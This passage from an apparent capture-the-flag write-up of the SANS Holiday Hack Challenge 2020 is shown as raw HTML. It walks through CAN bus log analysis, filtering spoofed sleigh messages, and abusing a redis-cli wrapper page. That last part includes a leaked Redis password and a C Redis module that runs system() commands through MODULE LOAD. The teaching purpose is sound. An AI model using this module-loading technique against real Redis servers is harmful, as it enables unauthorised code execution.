&lt;span class="go"&gt;(1608926660.866754) vcan0 244#000000018E&lt;/span&gt;
&lt;span class="go"&gt;(1608926660.879825) vcan0 244#000000015F&lt;/span&gt;
&lt;span class="go"&gt;(1608926660.892934) vcan0 244#0000000103&lt;/span&gt;
&lt;span class="go"&gt;(1608926660.904816) vcan0 244#0000000181&lt;/span&gt;
&lt;span class="go"&gt;(1608926660.920799) vcan0 244#000000015F&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The format of this log file seems to be:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
(timestamp) can_interface can_id#data
&lt;/pre&gt;
&lt;p&gt;Since different message types have different CAN IDs, let's see how many
different CAN IDs we have:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; awk &lt;span class="s1"&gt;&amp;#39;{print $3}&amp;#39;&lt;/span&gt; &amp;lt; candump.log &lt;span class="p"&gt;|&lt;/span&gt; cut -d&lt;span class="s1"&gt;&amp;#39;#&amp;#39;&lt;/span&gt; -f &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sort &lt;span class="p"&gt;|&lt;/span&gt; uniq -c &lt;span class="p"&gt;|&lt;/span&gt; sort -nr
&lt;span class="go"&gt;   1331 244&lt;/span&gt;
&lt;span class="go"&gt;     35 188&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      3 19B&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;CAN ID &lt;code&gt;19B&lt;/code&gt; only appears three times. Could it match with our LOCK,
UNLOCK, LOCK sequence? Let's see the different messages with this ID:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep &lt;span class="s1"&gt;&amp;#39;19B#&amp;#39;&lt;/span&gt; candump.log
&lt;span class="go"&gt;(1608926664.626448) vcan0 19B#000000000000&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;(1608926671.122520) vcan0 19B#00000F000000&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;(1608926674.092148) vcan0 19B#000000000000&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get our three messages, where the first and last ones seem to be the same.
This seems to corroborate our hypothesis! So this second message should be
our UNLOCK sequence. Let's submit the decimal part of the timestamp:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; elf@2f9d1e0b5c1f:~$ ./runtoanswer
&lt;span class="go"&gt;There are two LOCK codes and one UNLOCK code in the log.  What is the decimal portion of t&lt;/span&gt;
&lt;span class="go"&gt;he UNLOCK timestamp?&lt;/span&gt;
&lt;span class="go"&gt;(e.g., if the timestamp of the UNLOCK were 1608926672.391456, you would enter 391456.&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt; &lt;span class="m"&gt;122520&lt;/span&gt;
&lt;span class="go"&gt;Your answer: 122520&lt;/span&gt;

&lt;span class="go"&gt;Checking....&lt;/span&gt;
&lt;span class="go"&gt;Your answer is correct!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="solve-the-sleigh-s-can-d-bus-problem"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id34"&gt;Solve the Sleigh's CAN-D-BUS Problem&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're told that Santa's Sleigh is behaving strangely, something to do with
the CAN bus messages. Let's take a look under the hood. Everything is
implemented via the &lt;a class="reference external" href="https://candbus.kringlecastle.com/static/candbus.js"&gt;candbus.js source file&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We can see that the communication is done via web sockets:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// WS connector to CAN-D-bus&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;location&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;protocol&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;https:&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;ws&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;WebSocket&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;wss://&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;domain&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;:&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;location&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;port&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/ws&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;ws&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;WebSocket&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;ws://&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;domain&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;:&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;location&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;port&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/ws&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's spin up Burp to take a look at the web sockets communication. First of
all, we can see that we're receiving a constant stream of messages. Let's click
on the buttons of the interface to see what messages are being sent:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Sliding the accelerator to 60:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;Controls&amp;quot;,&amp;quot;ABSSS&amp;quot;:[60, 0, 0, 0, 0, 0, 0 ]}
&lt;/pre&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Sliding the brakes to 50:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;Controls&amp;quot;,&amp;quot;ABSSS&amp;quot;:[0, 50, 0, 0, 0, 0, 0 ]}
&lt;/pre&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Sliding the steering wheel to -25:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;Controls&amp;quot;,&amp;quot;ABSSS&amp;quot;:[0, 0, -25, 0, 0, 0, 0 ]}
&lt;/pre&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Pressing the &amp;quot;Start&amp;quot; button:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;Controls&amp;quot;,&amp;quot;ABSSS&amp;quot;:[0, 0, 0, 1, 0, 0, 0 ]}
&lt;/pre&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Pressing the &amp;quot;Stop&amp;quot; button:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;Controls&amp;quot;,&amp;quot;ABSSS&amp;quot;:[0, 0, 0, 0, 1, 0, 0 ]}
&lt;/pre&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Pressing the &amp;quot;Lock&amp;quot; button:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;Controls&amp;quot;,&amp;quot;ABSSS&amp;quot;:[0, 0, 0, 0, 0, 1, 0 ]}
&lt;/pre&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Pressing the &amp;quot;Unlock&amp;quot; button:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;Controls&amp;quot;,&amp;quot;ABSSS&amp;quot;:[0, 0, 0, 0, 0, 0, 1 ]}
&lt;/pre&gt;
&lt;p&gt;Pretty straightforward. Now let's see what messages are received when we
perform the same actions.&lt;/p&gt;
&lt;p&gt;Nothing happens if we set the accelerator to a non-zero value. We have to also
press the &amp;quot;Start&amp;quot; button. Then, we keep getting spammed with messages of the
form:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;244#000000118b&amp;quot;}
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;244#00000011bc&amp;quot;}
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;244#00000011bd&amp;quot;}
...
&lt;/pre&gt;
&lt;p&gt;Several messages with CAN id &lt;code&gt;244&lt;/code&gt;. Let's convert the data from hex to
decimal:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;0x118b = 4491&lt;/li&gt;
&lt;li&gt;0x11bc = 4540&lt;/li&gt;
&lt;li&gt;0x11bd = 4541&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It so happens that these values are closed to what we get on the speedometer:&lt;/p&gt;
&lt;img alt="sleigh_speedometer.png" class="align-center" src="/images/sans-christmas-challenge-2020/sleigh_speedometer.png" /&gt;
&lt;p&gt;We can check in the candbus.js file that messages with CAN id &lt;code&gt;244&lt;/code&gt; are
indeed for speed:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messageIn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Message&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;244&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="c1"&gt;// update tachometer if this is a tach message&lt;/span&gt;
  &lt;span class="nx"&gt;moveTachNeedle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messageIn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Message&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;14&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Pressing the &amp;quot;Stop&amp;quot; button sets the value back to 0:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;244#0000000000&amp;quot;}
&lt;/pre&gt;
&lt;p&gt;Now, let's check the steering. If we put it to a value of -26, we get spammed
with the following message:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;019#FFFFFFE7&amp;quot;}
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;019#FFFFFFE8&amp;quot;}
&lt;/pre&gt;
&lt;p&gt;We get a message with a CAN id of &lt;code&gt;019&lt;/code&gt; and data around 0xFFFFFFE7. If
may seem like a very large value, but it's actually a negative value in
&lt;a class="reference external" href="https://en.wikipedia.org/wiki/Two%27s_complement"&gt;two's complement&lt;/a&gt;.
You can use &lt;a class="reference external" href="https://www.omnicalculator.com/math/twos-complement"&gt;this website&lt;/a&gt;
to compute two's complement values. 0xFFFFFFE7 and 0xFFFFFFE8 are respectively
-25 and -24. Not exactly -26, I don't know why ¯\_(ツ)_/¯ but apparently
close enough for the steering system.&lt;/p&gt;
&lt;p&gt;Now, let's say we set the brakes value to 45, then we keep getting spammed with
messages of the form:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;080#00002d&amp;quot;}
&lt;/pre&gt;
&lt;p&gt;If we convert 0x2d to decimal, we get 45. So messages with CAN id &lt;code&gt;080&lt;/code&gt;
seem to be for the brakes value. However, we also see &lt;code&gt;080&lt;/code&gt; messages with
weird values:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;080#FFFFF3&amp;quot;}
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;080#FFFFFD&amp;quot;}
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;080#FFFFFA&amp;quot;}
...
&lt;/pre&gt;
&lt;p&gt;That's weird. We get negative values in two's complement. But the brake slider
only goes from 0 to 100, so we shouldn't get any negative values. So let's
filter them out, with filter:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;ID: &lt;code&gt;080&lt;/code&gt;. Operator: &lt;code&gt;Less&lt;/code&gt;. Criterion: &lt;code&gt;000000000000&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If we press the &amp;quot;Lock&amp;quot; button, we get the following message:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;19B#000000000000&amp;quot;}
&lt;/pre&gt;
&lt;p&gt;If we press the &amp;quot;Unlock&amp;quot; button, we get the following message:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;19B#00000F000000&amp;quot;}
&lt;/pre&gt;
&lt;p&gt;Hey, we recognize these messages from the Cranberry Pi challenge! So messages
with CAN id &lt;code&gt;19B&lt;/code&gt; are for locking/unlocking, depending on the data.
However, we also keep getting the following message with CAN id &lt;code&gt;19B&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;Type&amp;quot;:&amp;quot;CAN-D-bus&amp;quot;,&amp;quot;Message&amp;quot;:&amp;quot;19B#0000000F2057&amp;quot;}
&lt;/pre&gt;
&lt;p&gt;Now, that appears to be an incorrect message, so let's filter it out, with
filter:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;ID: &lt;code&gt;19B&lt;/code&gt;. Operator: &lt;code&gt;Equals&lt;/code&gt;. Criterion: &lt;code&gt;0000000F2057&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Aaaaand...&lt;/p&gt;
&lt;img alt="sleigh_defrosted.png" class="align-center" src="/images/sans-christmas-challenge-2020/sleigh_defrosted.png" /&gt;
&lt;p&gt;Bingo, the sleigh is working again!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-8"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id35"&gt;Objective 8:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="holly-evergreen-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id36"&gt;Holly Evergreen's Cranberry Pi challenge&lt;/a&gt;&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;We need your help!!&lt;/span&gt;

&lt;span class="go"&gt;The server stopped working, all that&amp;#39;s left is the maintenance port.&lt;/span&gt;

&lt;span class="go"&gt;To access it, run:&lt;/span&gt;

&lt;span class="go"&gt;curl http://localhost/maintenance.php&lt;/span&gt;

&lt;span class="go"&gt;We&amp;#39;re pretty sure the bug is in the index page. Can you somehow use the&lt;/span&gt;
&lt;span class="go"&gt;maintenance page to view the source code for the index page?&lt;/span&gt;
&lt;span class="gp"&gt;player@cc495dc0187f:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's try and call the &lt;code&gt;maintenance.php&lt;/code&gt; page:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php&amp;quot;&lt;/span&gt;


&lt;span class="go"&gt;ERROR: &amp;#39;cmd&amp;#39; argument required (use commas to separate commands); eg:&lt;/span&gt;
&lt;span class="go"&gt;curl http://localhost/maintenance.php?cmd=help&lt;/span&gt;
&lt;span class="go"&gt;curl http://localhost/maintenance.php?cmd=mget,example1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, let's try with &lt;code&gt;cmd=help&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php?cmd=help&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Running: redis-cli --raw -a &amp;#39;&amp;lt;password censored&amp;gt;&amp;#39; &amp;#39;help&amp;#39;&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;redis-cli 5.0.3&lt;/span&gt;
&lt;span class="go"&gt;To get help about Redis commands type:&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;help @&amp;lt;group&amp;gt;&amp;quot; to get a list of commands in &amp;lt;group&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;help &amp;lt;command&amp;gt;&amp;quot; for help on &amp;lt;command&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;help &amp;lt;tab&amp;gt;&amp;quot; to get a list of possible help topics&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;quit&amp;quot; to exit&lt;/span&gt;

&lt;span class="go"&gt;To set redis-cli preferences:&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;:set hints&amp;quot; enable online hints&lt;/span&gt;
&lt;span class="go"&gt;      &amp;quot;:set nohints&amp;quot; disable online hints&lt;/span&gt;
&lt;span class="go"&gt;Set your preferences in ~/.redisclirc&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;maintenance.php&lt;/code&gt; page seems to just be a wrapper around
&lt;code&gt;redis-cli&lt;/code&gt;. I first tried to escape from the single-quotes, but the page
seems to properly escape special characters, such as single quotes or
backslashes.&lt;/p&gt;
&lt;p&gt;So, we must make use of the available commands in &lt;code&gt;redis-cli&lt;/code&gt;. We can get
information, such as defined Redis keys (commands and arguments are separated
by commas):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php?cmd=keys,*&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Running: redis-cli --raw -a &amp;#39;&amp;lt;password censored&amp;gt;&amp;#39; &amp;#39;keys&amp;#39; &amp;#39;*&amp;#39;&lt;/span&gt;

&lt;span class="go"&gt;example2&lt;/span&gt;
&lt;span class="go"&gt;example1&lt;/span&gt;
&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php?cmd=get,example1&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Running: redis-cli --raw -a &amp;#39;&amp;lt;password censored&amp;gt;&amp;#39; &amp;#39;get&amp;#39; &amp;#39;example1&amp;#39;&lt;/span&gt;

&lt;span class="go"&gt;The site is in maintenance mode&lt;/span&gt;
&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php?cmd=get,example2&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Running: redis-cli --raw -a &amp;#39;&amp;lt;password censored&amp;gt;&amp;#39; &amp;#39;get&amp;#39; &amp;#39;example2&amp;#39;&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;We think there&amp;#39;s a bug in index.php&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can also get the current configuration, with &lt;code&gt;config get *&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;player@18aea30ee15b:~$&lt;/span&gt; curl &lt;span class="s1"&gt;&amp;#39;http://localhost/maintenance.php?cmd=config,get,*&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;Running: redis-cli --raw -a &amp;#39;&amp;lt;password censored&amp;gt;&amp;#39; &amp;#39;config&amp;#39; &amp;#39;get&amp;#39; &amp;#39;*&amp;#39;&lt;/span&gt;

&lt;span class="go"&gt;dbfilename&lt;/span&gt;
&lt;span class="go"&gt;dump.rdb&lt;/span&gt;
&lt;span class="go"&gt;requirepass&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;R3disp@ss&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;...&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can recover some fun stuff, but nothing that seems to help us in our quest!
I took a deeper dive in &lt;a class="reference external" href="https://redis.io/commands"&gt;Redis commands&lt;/a&gt;, and
thought I had found my winning ticket with the &lt;a class="reference external" href="https://redis.io/commands/eval"&gt;EVAL command&lt;/a&gt;.
It allows us to define a Lua script that will be executed by the Redis
instance. However, for security reasons, the Lua interpreter only loads a
subset of the Lua standard library. So no code execution, and no IO operations.&lt;/p&gt;
&lt;p&gt;Fortunately, another command seems to allow us to execute arbitrary commands:
&lt;a class="reference external" href="https://redis.io/commands/module-load"&gt;MODULE LOAD&lt;/a&gt;. We can give the path
to a dynamic library that will be loaded into the Redis process.&lt;/p&gt;
&lt;p&gt;So, let's code a Redis module! I used &lt;a class="reference external" href="https://redis.io/topics/modules-intro"&gt;this introduction to Redis modules&lt;/a&gt; and &lt;a class="reference external" href="https://redislabs.com/community/redis-modules-hub/how-to-build/"&gt;this Redis labs blog post on
how to build a Redis module&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here's the code I wrote, modified from the example in the intro to Redis
modules. To keep it simple, I just copy the &lt;code&gt;/var/www/html/index.php&lt;/code&gt;
to our home folder, and change the owner so that we can open it. To do so,
we'll only have to call the &lt;code&gt;copyindex.perform&lt;/code&gt; command via
&lt;code&gt;redis-cli&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;quot;redismodule.h&amp;quot;&lt;/span&gt;&lt;span class="cp"&gt;&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;CopyIndex_RedisCommand&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;RedisModuleCtx&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;RedisModuleString&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;cp /var/www/html/index.php /home/player/index.php&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;    &lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;chown player:player /home/player/index.php&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;REDISMODULE_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;RedisModule_OnLoad&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;RedisModuleCtx&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;RedisModuleString&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;RedisModule_Init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;copyindex&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;REDISMODULE_APIVER_1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;REDISMODULE_ERR&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;REDISMODULE_ERR&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

